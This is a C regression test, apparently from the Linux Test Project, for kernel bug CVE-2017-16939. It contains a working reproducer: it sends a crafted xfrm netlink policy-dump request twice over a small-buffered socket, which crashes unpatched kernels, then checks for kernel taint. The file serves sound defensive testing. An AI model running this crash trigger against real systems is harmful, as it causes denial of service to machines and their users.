1 // SPDX-License-Identifier: GPL-2.0-or-later
2 /*
3 * Copyright (c) 2018 Michael Moese <mmoese@suse.de>
4 */
5
6 /*\
7 * [Description]
8 *
9 * Test for CVE-2017-16939, which was fixed in kernel v4.14:
10 * 1137b5e2529a ("ipsec: Fix aborted xfrm policy dump crash").
11 *
12 * Based on the reproducing code from Mohammed Ghannam, published on
13 * https://blogs.securiteam.com/index.php/archives/3535
14 *
15 * CAUTION! If your system is vulnerable to this CVE, the crashes kernel.
16 */
17
18 #include <unistd.h>
19 #include <stdlib.h>
20 #include <string.h>
21 #include <sys/socket.h>
22 #include <sys/wait.h>
23 #include <netinet/in.h>
24 #include <linux/netlink.h>
25
26 #include "lapi/xfrm.h"
27 #include "tst_test.h"
28 #include "tst_res_flags.h"
29 #include "tst_safe_macros.h"
30 #include "tst_safe_net.h"
31 #include "lapi/sched.h"
32
33 static int fd = -1;
34 static struct sockaddr_nl nl_addr;
35 static struct nlmsghdr xfrm_msg;
36
setup(void)37 static void setup(void)
38 {
39 tst_setup_netns();
40
41 nl_addr.nl_family = AF_NETLINK;
42 nl_addr.nl_pid = 0; /* packet goes into the kernel */
43 nl_addr.nl_groups = XFRMNLGRP_NONE; /* no need for multicast group */
44
45 xfrm_msg.nlmsg_len = NLMSG_LENGTH(0);
46 xfrm_msg.nlmsg_type = XFRM_MSG_GETPOLICY;
47 xfrm_msg.nlmsg_flags = NLM_F_MATCH | NLM_F_MULTI | NLM_F_REQUEST;
48 xfrm_msg.nlmsg_seq = 0x1;
49 xfrm_msg.nlmsg_pid = 2;
50 }
51
send_nlmsg(int fd,struct nlmsghdr * msg,struct sockaddr_nl * addr)52 static void send_nlmsg(int fd, struct nlmsghdr *msg, struct sockaddr_nl *addr)
53 {
54 SAFE_SENDTO(1, fd, (void *)msg, msg->nlmsg_len, 0,
55 (struct sockaddr *)addr, sizeof(struct sockaddr_nl));
56 }
57
run(void)58 static void run(void)
59 {
60 fd = SAFE_SOCKET(PF_NETLINK, SOCK_RAW, NETLINK_XFRM);
61 SAFE_SETSOCKOPT_INT(fd, SOL_SOCKET, SO_RCVBUF, 0x100);
62
63 /* message must be sent twice to trigger the bug */
64 send_nlmsg(fd, &xfrm_msg, &nl_addr);
65 send_nlmsg(fd, &xfrm_msg, &nl_addr);
66 SAFE_CLOSE(fd);
67
68 /* wait for socket close callback to crash */
69 usleep(100000);
70
71 if (tst_taint_check()) {
72 tst_res(TFAIL, "Kernel is vulnerable");
73 return;
74 }
75
76 tst_res(TPASS, "Kernel seems to have survived");
77 }
78
cleanup(void)79 static void cleanup(void)
80 {
81 if (fd >= 0)
82 SAFE_CLOSE(fd);
83 }
84
85 static struct tst_test test = {
86 .setup = setup,
87 .test_all = run,
88 .cleanup = cleanup,
89 .taint_check = TST_TAINT_W | TST_TAINT_D,
90 .needs_kconfigs = (const char *[]) {
91 "CONFIG_USER_NS=y",
92 "CONFIG_NET_NS=y",
93 NULL
94 },
95 .save_restore = (const struct tst_path_val[]) {
96 {"/proc/sys/user/max_user_namespaces", "1024", TST_SR_SKIP},
97 {}
98 },
99 .tags = (const struct tst_tag[]) {
100 {"linux-git", "1137b5e2529a"},
101 {"CVE", "2017-16939"},
102 {}
103 }
104 };
105